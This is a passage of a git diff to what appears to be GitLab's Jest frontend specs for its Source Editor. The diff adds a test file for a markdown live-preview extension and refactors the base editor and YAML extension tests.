instance.setupPreviewAction(); - expect(instance.addAction).not.toHaveBeenCalled(); - }); - - it('toggles preview when the action is triggered', () => { - jest.spyOn(instance, 'togglePreview').mockImplementation(); - - expect(instance.togglePreview).not.toHaveBeenCalled(); - - const action = instance.getAction(EXTENSION_MARKDOWN_PREVIEW_ACTION_ID); - action.run(); - - expect(instance.togglePreview).toHaveBeenCalled(); - }); - }); - - describe('togglePreview', () => { - beforeEach(() => { - 
mockAxios.onPost().reply(200, { body: responseData }); - }); - - it('toggles preview flag on instance', () => { - expect(instance.preview.shown).toBe(false); - - instance.togglePreview(); - expect(instance.preview.shown).toBe(true); - - instance.togglePreview(); - expect(instance.preview.shown).toBe(false); - }); - - describe('panel DOM element set up', () => { - it('sets up an element to contain the preview and stores it on instance', () => { - expect(instance.preview.el).toBeUndefined(); - - instance.togglePreview(); - - expect(instance.preview.el).toBeDefined(); - expect(instance.preview.el.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_CLASS)).toBe( - true, - ); - }); - - it('re-uses existing preview DOM element on repeated calls', () => { - instance.togglePreview(); - const origPreviewEl = instance.preview.el; - instance.togglePreview(); - - expect(instance.preview.el).toBe(origPreviewEl); - }); - - it('hides the preview DOM element by default', () => { - panelSpy.mockImplementation(); - instance.togglePreview(); - expect(instance.preview.el.style.display).toBe('none'); - }); - }); - - describe('preview layout setup', () => { - it('sets correct preview layout', () => { - jest.spyOn(instance, 'layout'); - const { width, height } = instance.getLayoutInfo(); - - instance.togglePreview(); - - expect(instance.layout).toHaveBeenCalledWith({ - width: width * EXTENSION_MARKDOWN_PREVIEW_PANEL_WIDTH, - height, - }); - }); - }); - - describe('preview panel', () => { - it('toggles preview CSS class on the editor', () => { - expect(editorEl.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS)).toBe( - false, - ); - instance.togglePreview(); - expect(editorEl.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS)).toBe( - true, - ); - instance.togglePreview(); - expect(editorEl.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS)).toBe( - false, - ); - }); - - it('toggles visibility of the preview DOM element', async () => { - await 
togglePreview(); - expect(instance.preview.el.style.display).toBe('block'); - await togglePreview(); - expect(instance.preview.el.style.display).toBe('none'); - }); - - describe('hidden preview DOM element', () => { - it('listens to model changes and re-fetches preview', async () => { - expect(mockAxios.history.post).toHaveLength(0); - await togglePreview(); - expect(mockAxios.history.post).toHaveLength(1); - - instance.setValue('New Value'); - await waitForPromises(); - expect(mockAxios.history.post).toHaveLength(2); - }); - - it('stores disposable listener for model changes', async () => { - expect(instance.preview.modelChangeListener).toBeUndefined(); - await togglePreview(); - expect(instance.preview.modelChangeListener).toBeDefined(); - }); - }); - - describe('already visible preview', () => { - beforeEach(async () => { - await togglePreview(); - mockAxios.resetHistory(); - }); - - it('does not re-fetch the preview', () => { - instance.togglePreview(); - expect(mockAxios.history.post).toHaveLength(0); - }); - - it('disposes the model change event listener', () => { - const disposeSpy = jest.fn(); - instance.preview.modelChangeListener = { - dispose: disposeSpy, - }; - instance.togglePreview(); - expect(disposeSpy).toHaveBeenCalled(); - }); - }); - }); - }); - describe('getSelectedText', () => { it('does not fail if there is no selection and returns the empty string', () => { jest.spyOn(instance, 'getSelection'); @@ -525,13 +163,11 @@ describe('Markdown Extension for Source Editor', () => { }); it('does not fail when only `toSelect` is supplied and fetches the text from selection', () => { - jest.spyOn(instance, 'getSelectedText'); const toSelect = 'string'; selectSecondAndThirdLines(); instance.selectWithinSelection(toSelect); - expect(instance.getSelectedText).toHaveBeenCalled(); expect(selectionToString()).toBe(`[3,1 -> 3,${toSelect.length + 1}]`); }); diff --git a/spec/frontend/editor/source_editor_markdown_livepreview_ext_spec.js 
b/spec/frontend/editor/source_editor_markdown_livepreview_ext_spec.js new file mode 100644 index 00000000000..c8d016e10ac --- /dev/null +++ b/spec/frontend/editor/source_editor_markdown_livepreview_ext_spec.js @@ -0,0 +1,421 @@ +import MockAdapter from 'axios-mock-adapter'; +import { editor as monacoEditor } from 'monaco-editor'; +import waitForPromises from 'helpers/wait_for_promises'; +import { + EXTENSION_MARKDOWN_PREVIEW_PANEL_CLASS, + EXTENSION_MARKDOWN_PREVIEW_ACTION_ID, + EXTENSION_MARKDOWN_PREVIEW_PANEL_WIDTH, + EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS, + EXTENSION_MARKDOWN_PREVIEW_UPDATE_DELAY, +} from '~/editor/constants'; +import { EditorMarkdownPreviewExtension } from '~/editor/extensions/source_editor_markdown_livepreview_ext'; +import SourceEditor from '~/editor/source_editor'; +import createFlash from '~/flash'; +import axios from '~/lib/utils/axios_utils'; +import syntaxHighlight from '~/syntax_highlight'; +import { spyOnApi } from './helpers'; + +jest.mock('~/syntax_highlight'); +jest.mock('~/flash'); + +describe('Markdown Live Preview Extension for Source Editor', () => { + let editor; + let instance; + let editorEl; + let panelSpy; + let mockAxios; + let extension; + const previewMarkdownPath = '/gitlab/fooGroup/barProj/preview_markdown'; + const firstLine = 'This is a'; + const secondLine = 'multiline'; + const thirdLine = 'string with some **markup**'; + const text = `${firstLine}\n${secondLine}\n${thirdLine}`; + const plaintextPath = 'foo.txt'; + const markdownPath = 'foo.md'; + const responseData = '<div>FooBar</div>'; + + const togglePreview = async () => { + instance.togglePreview(); + await waitForPromises(); + }; + + beforeEach(() => { + mockAxios = new MockAdapter(axios); + setFixtures('<div id="editor" data-editor-loading></div>'); + editorEl = document.getElementById('editor'); + editor = new SourceEditor(); + instance = editor.createInstance({ + el: editorEl, + blobPath: markdownPath, + blobContent: text, + }); + extension = 
instance.use({ + definition: EditorMarkdownPreviewExtension, + setupOptions: { previewMarkdownPath }, + }); + panelSpy = jest.spyOn(extension.obj.constructor.prototype, 'togglePreviewPanel'); + }); + + afterEach(() => { + instance.dispose(); + editorEl.remove(); + mockAxios.restore(); + }); + + it('sets up the preview on the instance', () => { + expect(instance.markdownPreview).toEqual({ + el: undefined, + action: expect.any(Object), + shown: false, + modelChangeListener: undefined, + path: previewMarkdownPath, + }); + }); + + describe('model language changes listener', () => { + let cleanupSpy; + let actionSpy; + + beforeEach(async () => { + cleanupSpy = jest.fn(); + actionSpy = jest.fn(); + spyOnApi(extension, { + cleanup: cleanupSpy, + setupPreviewAction: actionSpy, + }); + await togglePreview(); + }); + + afterEach(() => { + jest.clearAllMocks(); + }); + + it('cleans up when switching away from markdown', () => { + expect(cleanupSpy).not.toHaveBeenCalled(); + expect(actionSpy).not.toHaveBeenCalled(); + + instance.updateModelLanguage(plaintextPath); + + expect(cleanupSpy).toHaveBeenCalled(); + expect(actionSpy).not.toHaveBeenCalled(); + }); + + it.each` + oldLanguage | newLanguage | setupCalledTimes + ${'plaintext'} | ${'markdown'} | ${1} + ${'markdown'} | ${'markdown'} | ${0} + ${'markdown'} | ${'plaintext'} | ${0} + ${'markdown'} | ${undefined} | ${0} + ${undefined} | ${'markdown'} | ${1} + `( + 'correctly handles re-enabling of the action when switching from $oldLanguage to $newLanguage', + ({ oldLanguage, newLanguage, setupCalledTimes } = {}) => { + expect(actionSpy).not.toHaveBeenCalled(); + instance.updateModelLanguage(oldLanguage); + instance.updateModelLanguage(newLanguage); + expect(actionSpy).toHaveBeenCalledTimes(setupCalledTimes); + }, + ); + }); + + describe('model change listener', () => { + let cleanupSpy; + let actionSpy; + + beforeEach(() => { + cleanupSpy = jest.fn(); + actionSpy = jest.fn(); + spyOnApi(extension, { + cleanup: cleanupSpy, + 
setupPreviewAction: actionSpy, + }); + instance.togglePreview(); + }); + + afterEach(() => { + jest.clearAllMocks(); + }); + + it('does not do anything if there is no model', () => { + instance.setModel(null); + + expect(cleanupSpy).not.toHaveBeenCalled(); + expect(actionSpy).not.toHaveBeenCalled(); + }); + + it('cleans up the preview when the model changes', () => { + instance.setModel(monacoEditor.createModel('foo')); + expect(cleanupSpy).toHaveBeenCalled(); + }); + + it.each` + language | setupCalledTimes + ${'markdown'} | ${1} + ${'plaintext'} | ${0} + ${undefined} | ${0} + `( + 'correctly handles actions when the new model is $language', + ({ language, setupCalledTimes } = {}) => { + instance.setModel(monacoEditor.createModel('foo', language)); + + expect(actionSpy).toHaveBeenCalledTimes(setupCalledTimes); + }, + ); + }); + + describe('cleanup', () => { + beforeEach(async () => { + mockAxios.onPost().reply(200, { body: responseData }); + await togglePreview(); + }); + + it('disposes the modelChange listener and does not fetch preview on content changes', () => { + expect(instance.markdownPreview.modelChangeListener).toBeDefined(); + const fetchPreviewSpy = jest.fn(); + spyOnApi(extension, { + fetchPreview: fetchPreviewSpy, + }); + + instance.cleanup(); + instance.setValue('Foo Bar'); + jest.advanceTimersByTime(EXTENSION_MARKDOWN_PREVIEW_UPDATE_DELAY); + + expect(fetchPreviewSpy).not.toHaveBeenCalled(); + }); + + it('removes the contextual menu action', () => { + expect(instance.getAction(EXTENSION_MARKDOWN_PREVIEW_ACTION_ID)).toBeDefined(); + + instance.cleanup(); + + expect(instance.getAction(EXTENSION_MARKDOWN_PREVIEW_ACTION_ID)).toBe(null); + }); + + it('toggles the `shown` flag', () => { + expect(instance.markdownPreview.shown).toBe(true); + instance.cleanup(); + expect(instance.markdownPreview.shown).toBe(false); + }); + + it('toggles the panel only if the preview is visible', () => { + const { el: previewEl } = instance.markdownPreview; + const parentEl 
= previewEl.parentElement; + + expect(previewEl).toBeVisible(); + expect(parentEl.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS)).toBe(true); + + instance.cleanup(); + expect(previewEl).toBeHidden(); + expect(parentEl.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS)).toBe( + false, + ); + + instance.cleanup(); + expect(previewEl).toBeHidden(); + expect(parentEl.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS)).toBe( + false, + ); + }); + + it('toggles the layout only if the preview is visible', () => { + const { width } = instance.getLayoutInfo(); + + expect(instance.markdownPreview.shown).toBe(true); + + instance.cleanup(); + + const { width: newWidth } = instance.getLayoutInfo(); + expect(newWidth === width / EXTENSION_MARKDOWN_PREVIEW_PANEL_WIDTH).toBe(true); + + instance.cleanup(); + expect(newWidth === width / EXTENSION_MARKDOWN_PREVIEW_PANEL_WIDTH).toBe(true); + }); + }); + + describe('fetchPreview', () => { + const fetchPreview = async () => { + instance.fetchPreview(); + await waitForPromises(); + }; + + let previewMarkdownSpy; + + beforeEach(() => { + previewMarkdownSpy = jest.fn().mockImplementation(() => [200, { body: responseData }]); + mockAxios.onPost(previewMarkdownPath).replyOnce((req) => previewMarkdownSpy(req)); + }); + + it('correctly fetches preview based on previewMarkdownPath', async () => { + await fetchPreview(); + + expect(previewMarkdownSpy).toHaveBeenCalledWith( + expect.objectContaining({ data: JSON.stringify({ text }) }), + ); + }); + + it('puts the fetched content into the preview DOM element', async () => { + instance.markdownPreview.el = editorEl.parentElement; + await fetchPreview(); + expect(instance.markdownPreview.el.innerHTML).toEqual(responseData); + }); + + it('applies syntax highlighting to the preview content', async () => { + instance.markdownPreview.el = editorEl.parentElement; + await fetchPreview(); + expect(syntaxHighlight).toHaveBeenCalled(); + }); + + it('catches 
the errors when fetching the preview', async () => { + mockAxios.onPost().reply(500); + + await fetchPreview(); + expect(createFlash).toHaveBeenCalled(); + }); + }); + + describe('setupPreviewAction', () => { + it('adds the contextual menu action', () => { + expect(instance.getAction(EXTENSION_MARKDOWN_PREVIEW_ACTION_ID)).toBeDefined(); + }); + + it('does not set up action if one already exists', () => { + jest.spyOn(instance, 'addAction').mockImplementation(); + + instance.setupPreviewAction(); + expect(instance.addAction).not.toHaveBeenCalled(); + }); + + it('toggles preview when the action is triggered', () => { + const togglePreviewSpy = jest.fn(); + spyOnApi(extension, { + togglePreview: togglePreviewSpy, + }); + + expect(togglePreviewSpy).not.toHaveBeenCalled(); + + const action = instance.getAction(EXTENSION_MARKDOWN_PREVIEW_ACTION_ID); + action.run(); + + expect(togglePreviewSpy).toHaveBeenCalled(); + }); + }); + + describe('togglePreview', () => { + beforeEach(() => { + mockAxios.onPost().reply(200, { body: responseData }); + }); + + it('toggles preview flag on instance', () => { + expect(instance.markdownPreview.shown).toBe(false); + + instance.togglePreview(); + expect(instance.markdownPreview.shown).toBe(true); + + instance.togglePreview(); + expect(instance.markdownPreview.shown).toBe(false); + }); + + describe('panel DOM element set up', () => { + it('sets up an element to contain the preview and stores it on instance', () => { + expect(instance.markdownPreview.el).toBeUndefined(); + + instance.togglePreview(); + + expect(instance.markdownPreview.el).toBeDefined(); + expect( + instance.markdownPreview.el.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_CLASS), + ).toBe(true); + }); + + it('re-uses existing preview DOM element on repeated calls', () => { + instance.togglePreview(); + const origPreviewEl = instance.markdownPreview.el; + instance.togglePreview(); + + expect(instance.markdownPreview.el).toBe(origPreviewEl); + }); + + it('hides the 
preview DOM element by default', () => { + panelSpy.mockImplementation(); + instance.togglePreview(); + expect(instance.markdownPreview.el.style.display).toBe('none'); + }); + }); + + describe('preview layout setup', () => { + it('sets correct preview layout', () => { + jest.spyOn(instance, 'layout'); + const { width, height } = instance.getLayoutInfo(); + + instance.togglePreview(); + + expect(instance.layout).toHaveBeenCalledWith({ + width: width * EXTENSION_MARKDOWN_PREVIEW_PANEL_WIDTH, + height, + }); + }); + }); + + describe('preview panel', () => { + it('toggles preview CSS class on the editor', () => { + expect(editorEl.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS)).toBe( + false, + ); + instance.togglePreview(); + expect(editorEl.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS)).toBe( + true, + ); + instance.togglePreview(); + expect(editorEl.classList.contains(EXTENSION_MARKDOWN_PREVIEW_PANEL_PARENT_CLASS)).toBe( + false, + ); + }); + + it('toggles visibility of the preview DOM element', async () => { + await togglePreview(); + expect(instance.markdownPreview.el.style.display).toBe('block'); + await togglePreview(); + expect(instance.markdownPreview.el.style.display).toBe('none'); + }); + + describe('hidden preview DOM element', () => { + it('listens to model changes and re-fetches preview', async () => { + expect(mockAxios.history.post).toHaveLength(0); + await togglePreview(); + expect(mockAxios.history.post).toHaveLength(1); + + instance.setValue('New Value'); + await waitForPromises(); + expect(mockAxios.history.post).toHaveLength(2); + }); + + it('stores disposable listener for model changes', async () => { + expect(instance.markdownPreview.modelChangeListener).toBeUndefined(); + await togglePreview(); + expect(instance.markdownPreview.modelChangeListener).toBeDefined(); + }); + }); + + describe('already visible preview', () => { + beforeEach(async () => { + await togglePreview(); + mockAxios.resetHistory(); + }); 
+ + it('does not re-fetch the preview', () => { + instance.togglePreview(); + expect(mockAxios.history.post).toHaveLength(0); + }); + + it('disposes the model change event listener', () => { + const disposeSpy = jest.fn(); + instance.markdownPreview.modelChangeListener = { + dispose: disposeSpy, + }; + instance.togglePreview(); + expect(disposeSpy).toHaveBeenCalled(); + }); + }); + }); + }); +}); diff --git a/spec/frontend/editor/source_editor_spec.js b/spec/frontend/editor/source_editor_spec.js index d87d373c952..bc53202c919 100644 --- a/spec/frontend/editor/source_editor_spec.js +++ b/spec/frontend/editor/source_editor_spec.js @@ -1,16 +1,28 @@ -/* eslint-disable max-classes-per-file */ import { editor as monacoEditor, languages as monacoLanguages } from 'monaco-editor'; -import waitForPromises from 'helpers/wait_for_promises'; import { SOURCE_EDITOR_INSTANCE_ERROR_NO_EL, URI_PREFIX, EDITOR_READY_EVENT, } from '~/editor/constants'; -import { SourceEditorExtension } from '~/editor/extensions/source_editor_extension_base'; import SourceEditor from '~/editor/source_editor'; import { DEFAULT_THEME, themes } from '~/ide/lib/themes'; import { joinPaths } from '~/lib/utils/url_utility'; +jest.mock('~/helpers/startup_css_helper', () => { + return { + waitForCSSLoaded: jest.fn().mockImplementation((cb) => { + // We have to artificially put the callback's execution + // to the end of the current call stack to be able to + // test that the callback is called after waitForCSSLoaded. + // setTimeout with 0 delay does exactly that. 
+ // Otherwise we might end up with false positive results + setTimeout(() => { + cb.apply(); + }, 0); + }), + }; +}); + describe('Base editor', () => { let editorEl; let editor; @@ -19,7 +31,6 @@ describe('Base editor', () => { const blobContent = 'Foo Bar'; const blobPath = 'test.md'; const blobGlobalId = 'snippet_777'; - const fakeModel = { foo: 'bar', dispose: jest.fn() }; beforeEach(() => { setFixtures('<div id="editor" data-editor-loading></div>'); @@ -52,16 +63,6 @@ describe('Base editor', () => { describe('instance of the Source Editor', () => { let modelSpy; let instanceSpy; - const setModel = jest.fn(); - const dispose = jest.fn(); - const mockModelReturn = (res = fakeModel) => { - modelSpy = jest.spyOn(monacoEditor, 'createModel').mockImplementation(() => res); - }; - const mockDecorateInstance = (decorations = {}) => { - jest.spyOn(SourceEditor, 'convertMonacoToELInstance').mockImplementation((inst) => { - return Object.assign(inst, decorations); - }); - }; beforeEach(() => { modelSpy = jest.spyOn(monacoEditor, 'createModel'); @@ -73,46 +74,38 @@ describe('Base editor', () => { }); it('throws an error if no dom element is supplied', () => { - mockDecorateInstance(); - expect(() => { + const create = () => { editor.createInstance(); - }).toThrow(SOURCE_EDITOR_INSTANCE_ERROR_NO_EL); + }; + expect(create).toThrow(SOURCE_EDITOR_INSTANCE_ERROR_NO_EL); expect(modelSpy).not.toHaveBeenCalled(); expect(instanceSpy).not.toHaveBeenCalled(); - expect(SourceEditor.convertMonacoToELInstance).not.toHaveBeenCalled(); }); - it('creates model to be supplied to Monaco editor', () => { - mockModelReturn(); - mockDecorateInstance({ - setModel, - }); - editor.createInstance(defaultArguments); + it('creates model and attaches it to the instance', () => { + jest.spyOn(monacoEditor, 'createModel'); + const instance = editor.createInstance(defaultArguments); - expect(modelSpy).toHaveBeenCalledWith( + expect(monacoEditor.createModel).toHaveBeenCalledWith( blobContent, undefined, 
expect.objectContaining({ path: uriFilePath, }), ); - expect(setModel).toHaveBeenCalledWith(fakeModel); + expect(instance.getModel().getValue()).toEqual(defaultArguments.blobContent); }); it('does not create a model automatically if model is passed as `null`', () => { - mockDecorateInstance({ - setModel, - }); - editor.createInstance({ ...defaultArguments, model: null }); - expect(modelSpy).not.toHaveBeenCalled(); - expect(setModel).not.toHaveBeenCalled(); + const instance = editor.createInstance({ ...defaultArguments, model: null }); + expect(instance.getModel()).toBeNull(); }); it('initializes the instance on a supplied DOM node', () => { editor.createInstance({ el: editorEl }); - expect(editor.editorEl).not.toBe(null); + expect(editor.editorEl).not.toBeNull(); expect(instanceSpy).toHaveBeenCalledWith(editorEl, expect.anything()); }); @@ -143,32 +136,43 @@ describe('Base editor', () => { }); it('disposes instance when the global editor is disposed', () => { - mockDecorateInstance({ - dispose, - }); - editor.createInstance(defaultArguments); + const instance = editor.createInstance(defaultArguments); + instance.dispose = jest.fn(); - expect(dispose).not.toHaveBeenCalled(); + expect(instance.dispose).not.toHaveBeenCalled(); editor.dispose(); - expect(dispose).toHaveBeenCalled(); + expect(instance.dispose).toHaveBeenCalled(); }); it("removes the disposed instance from the global editor's storage and disposes the associated model", () => { - mockModelReturn(); - mockDecorateInstance({ - setModel, - }); const instance = editor.createInstance(defaultArguments); expect(editor.instances).toHaveLength(1); - expect(fakeModel.dispose).not.toHaveBeenCalled(); + expect(instance.getModel()).not.toBeNull(); instance.dispose(); expect(editor.instances).toHaveLength(0); - expect(fakeModel.dispose).toHaveBeenCalled(); + expect(instance.getModel()).toBeNull(); + }); + + it('resets the layout in waitForCSSLoaded callback', async () => { + const layoutSpy = jest.fn(); + 
jest.spyOn(monacoEditor, 'create').mockReturnValue({ + layout: layoutSpy, + setModel: jest.fn(), + onDidDispose: jest.fn(), + dispose: jest.fn(), + }); + editor.createInstance(defaultArguments); + expect(layoutSpy).not.toHaveBeenCalled(); + + // We're waiting for the waitForCSSLoaded mock to kick in + await jest.runOnlyPendingTimers(); + + expect(layoutSpy).toHaveBeenCalled(); }); }); @@ -214,26 +218,17 @@ describe('Base editor', () => { }); it('correctly disposes the diff editor model', () => { - const modifiedModel = fakeModel; - const originalModel = { ...fakeModel }; - mockDecorateInstance({ - getModel: jest.fn().mockReturnValue({ - original: originalModel, - modified: modifiedModel, - }), - }); - const instance = editor.createDiffInstance({ ...defaultArguments, blobOriginalContent }); expect(editor.instances).toHaveLength(1); - expect(originalModel.dispose).not.toHaveBeenCalled(); - expect(modifiedModel.dispose).not.toHaveBeenCalled(); + expect(instance.getOriginalEditor().getModel()).not.toBeNull(); + expect(instance.getModifiedEditor().getModel()).not.toBeNull(); instance.dispose(); expect(editor.instances).toHaveLength(0); - expect(originalModel.dispose).toHaveBeenCalled(); - expect(modifiedModel.dispose).toHaveBeenCalled(); + expect(instance.getOriginalEditor().getModel()).toBeNull(); + expect(instance.getModifiedEditor().getModel()).toBeNull(); }); }); }); @@ -355,282 +350,19 @@ describe('Base editor', () => { expect(instance.getValue()).toBe(blobContent); }); - it('is capable of changing the language of the model', () => { - // ignore warnings and errors Monaco posts during setup - // (due to being called from Jest/Node.js environment) - jest.spyOn(console, 'warn').mockImplementation(() => {}); - jest.spyOn(console, 'error').mockImplementation(() => {}); - - const blobRenamedPath = 'test.js'; - - expect(instance.getModel().getLanguageIdentifier().language).toBe('markdown'); - instance.updateModelLanguage(blobRenamedPath); - - 
expect(instance.getModel().getLanguageIdentifier().language).toBe('javascript'); - }); - - it('falls back to plaintext if there is no language associated with an extension', () => { - const blobRenamedPath = 'test.myext'; - const spy = jest.spyOn(console, 'error').mockImplementation(() => {}); - - instance.updateModelLanguage(blobRenamedPath); - - expect(spy).not.toHaveBeenCalled(); - expect(instance.getModel().getLanguageIdentifier().language).toBe('plaintext'); - }); - }); - - describe('extensions', () => { - let instance; - const alphaRes = jest.fn(); - const betaRes = jest.fn(); - const fooRes = jest.fn(); - const barRes = jest.fn(); - class AlphaClass { - constructor() { - this.res = alphaRes; - } - alpha() { - return this?.nonExistentProp || alphaRes; - } - } - class BetaClass { - beta() { - return this?.nonExistentProp || betaRes; - } - } - class WithStaticMethod { - constructor({ instance: inst, ...options } = {}) { - Object.assign(inst, options); - } - static computeBoo(a) { - return a + 1; - } - boo() { - return WithStaticMethod.computeBoo(this.base); - } - } - class WithStaticMethodExtended extends SourceEditorExtension { - static computeBoo(a) { - return a + 1; - } - boo() { - return WithStaticMethodExtended.computeBoo(this.base); - } - } - const AlphaExt = new AlphaClass(); - const BetaExt = new BetaClass(); - const FooObjExt = { - foo() { - return fooRes; - }, - }; - const BarObjExt = { - bar() { - return barRes; - }, - }; - - describe('basic functionality', () => { - beforeEach(() => { - instance = editor.createInstance({ el: editorEl, blobPath, blobContent }); - }); - - it('does not fail if no extensions supplied', () => { - const spy = jest.spyOn(global.console, 'error'); - instance.use(); - - expect(spy).not.toHaveBeenCalled(); - }); - - it("does not extend instance with extension's constructor", () => { - expect(instance.constructor).toBeDefined(); - const { constructor } = instance; - - expect(AlphaExt.constructor).toBeDefined(); - 
expect(AlphaExt.constructor).not.toEqual(constructor); - - instance.use(AlphaExt); - expect(instance.constructor).toBe(constructor); - }); - - it.each` - type | extensions | methods | expectations - ${'ES6 classes'} | ${AlphaExt} | ${['alpha']} | ${[alphaRes]} - ${'multiple ES6 classes'} | ${[AlphaExt, BetaExt]} | ${['alpha', 'beta']} | ${[alphaRes, betaRes]} - ${'simple objects'} | ${FooObjExt} | ${['foo']} | ${[fooRes]} - ${'multiple simple objects'} | ${[FooObjExt, BarObjExt]} | ${['foo', 'bar']} | ${[fooRes, barRes]} - ${'combination of ES6 classes and objects'} | ${[AlphaExt, BarObjExt]} | ${['alpha', 'bar']} | ${[alphaRes, barRes]} - `('is extensible with $type', ({ extensions, methods, expectations } = {}) => { - methods.forEach((method) => { - expect(instance[method]).toBeUndefined(); - }); - - instance.use(extensions); - - methods.forEach((method) => { - expect(instance[method]).toBeDefined(); - }); - - expectations.forEach((expectation, i) => { - expect(instance[methods[i]].call()).toEqual(expectation); - }); - }); - - it('does not extend instance with private data of an extension', () => { - const ext = new WithStaticMethod({ instance }); - ext.staticMethod = () => { - return 'foo'; - }; - ext.staticProp = 'bar'; - - expect(instance.boo).toBeUndefined(); - expect(instance.staticMethod).toBeUndefined(); - expect(instance.staticProp).toBeUndefined(); - - instance.use(ext); - - expect(instance.boo).toBeDefined(); - expect(instance.staticMethod).toBeUndefined(); - expect(instance.staticProp).toBeUndefined(); - }); - - it.each([WithStaticMethod, WithStaticMethodExtended])( - 'properly resolves data for an extension with private data', - (ExtClass) => { - const base = 1; - expect(instance.base).toBeUndefined(); - expect(instance.boo).toBeUndefined(); - - const ext = new ExtClass({ instance, base }); - - instance.use(ext); - expect(instance.base).toBe(1); - expect(instance.boo()).toBe(2); - }, - ); - - it('uses the last definition of a method in case of an 
overlap', () => { - const FooObjExt2 = { foo: 'foo2' }; - instance.use([FooObjExt, BarObjExt, FooObjExt2]); - expect(instance).toMatchObject({ - foo: 'foo2', - ...BarObjExt, - }); - }); - - it('correctly resolves references withing extensions', () => { - const FunctionExt = { - inst() { - return this; - }, - mod() { - return this.getModel(); - }, + it('emits the EDITOR_READY_EVENT event after setting up the instance', () => { + jest.spyOn(monacoEditor, 'create').mockImplementation(() => { + return { + setModel: jest.fn(), + onDidDispose: jest.fn(), + layout: jest.fn(), }; - instance.use(FunctionExt); - expect(instance.inst()).toEqual(editor.instances[0]); - }); - }); - - describe('extensions as an instance parameter', () => { - let editorExtensionSpy; - const instanceConstructor = (extensions = []) => { - return editor.createInstance({ - el: editorEl, - blobPath, - blobContent, - extensions, - }); - }; - - beforeEach(() => { - editorExtensionSpy = jest - .spyOn(SourceEditor, 'pushToImportsArray') - .mockImplementation((arr) => { - arr.push( - Promise.resolve({ - default: {}, - }), - ); - }); - }); - - it.each([undefined, [], [''], ''])( - 'does not fail and makes no fetch if extensions is %s', - () => { - instance = instanceConstructor(null); - expect(editorExtensionSpy).not.toHaveBeenCalled(); - }, - ); - - it.each` - type | value | callsCount - ${'simple string'} | ${'foo'} | ${1} - ${'combined string'} | ${'foo, bar'} | ${2} - ${'array of strings'} | ${['foo', 'bar']} | ${2} - `('accepts $type as an extension parameter', ({ value, callsCount }) => { - instance = instanceConstructor(value); - expect(editorExtensionSpy).toHaveBeenCalled(); - expect(editorExtensionSpy.mock.calls).toHaveLength(callsCount); - }); - - it.each` - desc | path | expectation - ${'~/editor'} | ${'foo'} | ${'~/editor/foo'} - ${'~/CUSTOM_PATH with leading slash'} | ${'/my_custom_path/bar'} | ${'~/my_custom_path/bar'} - ${'~/CUSTOM_PATH without leading slash'} | ${'my_custom_path/delta'} | 
${'~/my_custom_path/delta'} - `('fetches extensions from $desc path', ({ path, expectation }) => { - instance = instanceConstructor(path); - expect(editorExtensionSpy).toHaveBeenCalledWith(expect.any(Array), expectation); - }); - - it('emits EDITOR_READY_EVENT event after all extensions were applied', async () => { - const calls = []; - const eventSpy = jest.fn().mockImplementation(() => { - calls.push('event'); - }); - const useSpy = jest.fn().mockImplementation(() => { - calls.push('use'); - }); - jest.spyOn(SourceEditor, 'convertMonacoToELInstance').mockImplementation((inst) => { - const decoratedInstance = inst; - decoratedInstance.use = useSpy; - return decoratedInstance; - }); - editorEl.addEventListener(EDITOR_READY_EVENT, eventSpy); - instance = instanceConstructor('foo, bar'); - await waitForPromises(); - expect(useSpy.mock.calls).toHaveLength(2); - expect(calls).toEqual(['use', 'use', 'event']); - }); - }); - - describe('multiple instances', () => { - let inst1; - let inst2; - let editorEl1; - let editorEl2; - - beforeEach(() => { - setFixtures('<div id="editor1"></div><div id="editor2"></div>'); - editorEl1 = document.getElementById('editor1'); - editorEl2 = document.getElementById('editor2'); - inst1 = editor.createInstance({ el: editorEl1, blobPath: `foo-${blobPath}` }); - inst2 = editor.createInstance({ el: editorEl2, blobPath: `bar-${blobPath}` }); - }); - - afterEach(() => { - editor.dispose(); - editorEl1.remove(); - editorEl2.remove(); - }); - - it('extends all instances if no specific instance is passed', () => { - editor.use(AlphaExt); - expect(inst1.alpha()).toEqual(alphaRes); - expect(inst2.alpha()).toEqual(alphaRes); }); + const eventSpy = jest.fn(); + editorEl.addEventListener(EDITOR_READY_EVENT, eventSpy); + expect(eventSpy).not.toHaveBeenCalled(); + editor.createInstance({ el: editorEl }); + expect(eventSpy).toHaveBeenCalled(); }); }); diff --git a/spec/frontend/editor/source_editor_yaml_ext_spec.js 
b/spec/frontend/editor/source_editor_yaml_ext_spec.js index 97d2b0b21d0..a861d9c7a45 100644 --- a/spec/frontend/editor/source_editor_yaml_ext_spec.js +++ b/spec/frontend/editor/source_editor_yaml_ext_spec.js @@ -2,6 +2,10 @@ import { Document } from 'yaml'; import SourceEditor from '~/editor/source_editor'; import { YamlEditorExtension } from '~/editor/extensions/source_editor_yaml_ext'; import { SourceEditorExtension } from '~/editor/extensions/source_editor_extension_base'; +import { spyOnApi } from 'jest/editor/helpers'; + +let baseExtension; +let yamlExtension; const getEditorInstance = (editorInstanceOptions = {}) => { setFixtures('<div id="editor"></div>'); @@ -16,7 +20,10 @@ const getEditorInstance = (editorInstanceOptions = {}) => { const getEditorInstanceWithExtension = (extensionOptions = {}, editorInstanceOptions = {}) => { setFixtures('<div id="editor"></div>'); const instance = getEditorInstance(editorInstanceOptions); - instance.use(new YamlEditorExtension({ instance, ...extensionOptions })); + [baseExtension, yamlExtension] = instance.use([ + { definition: SourceEditorExtension }, + { definition: YamlEditorExtension, setupOptions: extensionOptions }, + ]); // Remove the below once // https://gitlab.com/gitlab-org/gitlab/-/issues/325992 is resolved @@ -29,19 +36,16 @@ const getEditorInstanceWithExtension = (extensionOptions = {}, editorInstanceOpt describe('YamlCreatorExtension', () => { describe('constructor', () => { - it('saves constructor options', () => { + it('saves setupOptions options on the extension, but does not 